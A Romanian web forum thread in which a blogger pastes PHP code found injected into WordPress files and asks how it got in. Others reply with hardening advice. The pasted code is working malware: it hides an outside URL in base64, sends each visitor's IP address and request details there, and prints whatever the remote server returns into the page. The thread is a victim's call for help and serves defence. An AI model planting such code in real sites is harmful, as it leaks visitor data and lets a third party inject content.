Virus in base64

[Realtuning]

Astazi m-am trezit cu blogul virusat si umplut prin index.php, pages.php si footer.php cu un cod strain, iar atributele folderelor au fost schimbate din 644 in 777.

Stie cineva ceva despre acest cod:

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQuc Ghw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainnam e='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

Stie cineva care este portita prin care se strecoara?PS: nu numai la wordpress, ci si la alte platforme cu e php fusion si altele s-a strecurat. A mai patit cineva asta?

[haos]

Se discuta chestia asta pe mai multe threaduri. Daca o sa te uiti, sunt usor de gasit. Nu exista un raspuns general valabil dar cauza este peste tot aceeasi, o securizare slaba. Pentru wordpress, ajuta-te de WordFence, pentru alte platforme, vezi cum si-au mai securizat si altii siteurile pe platformele respective. Daca ai un buget cat de mic pentru capitolul securitate, da-mi un mesaj si vedem ce putem face.

[kleampa]

daca esti pe hosting shared, problema e posibil sa fie la oricare din ceilalti clienti hostati pe serverul respectiv.

[felix]

Problema blogurilor neactualizate, ar fii bun un topic separat cu sfaturi si plugin-uri pentru securizare WP.

[haos]

Problema blogurilor neactualizate, ar fii bun un topic separat cu sfaturi si plugin-uri pentru securizare WP.

Ti-am dat un like pentru replica asta, pentru ca asa este.. Se deschid prea multe topicuri pe acelasi subiect in mod repetat si in final problema de baza tot nu se rezolva. As fi scris eu un articol despre asta dar din pacate nu mai am timp pentru a scrie atat de detaliat pe cat merita tratat acest subiect.

[felix]

Mersi de +, chiar ar fii bine venit un topic cu aceste probleme, dupa ce am vazut problemele pe forum ale colegiilor, ieri mi-am actulizat toate wp-urile, le-am scos versiunea sa nu mai poata fii accesata si mi-am instalat un plugins de back-ul pe care il poti seta sa faca back-up periodic pentru a scapa de surprize. Ma gandesc ca ar mai fii si altele......

[haos]

E bine ca ai luat masuri, dar astea sunt sub 1% din totalul de masuri de securitate. Printre altele, dupa cum spune si Kleampa, si compania de hosting are rolul ei, pentru ca daca infectia provine de la conturile vecine de hosting, nu prea te poti proteja. E bine ca faci backup, asta o sa te scape de multe dureri de cap.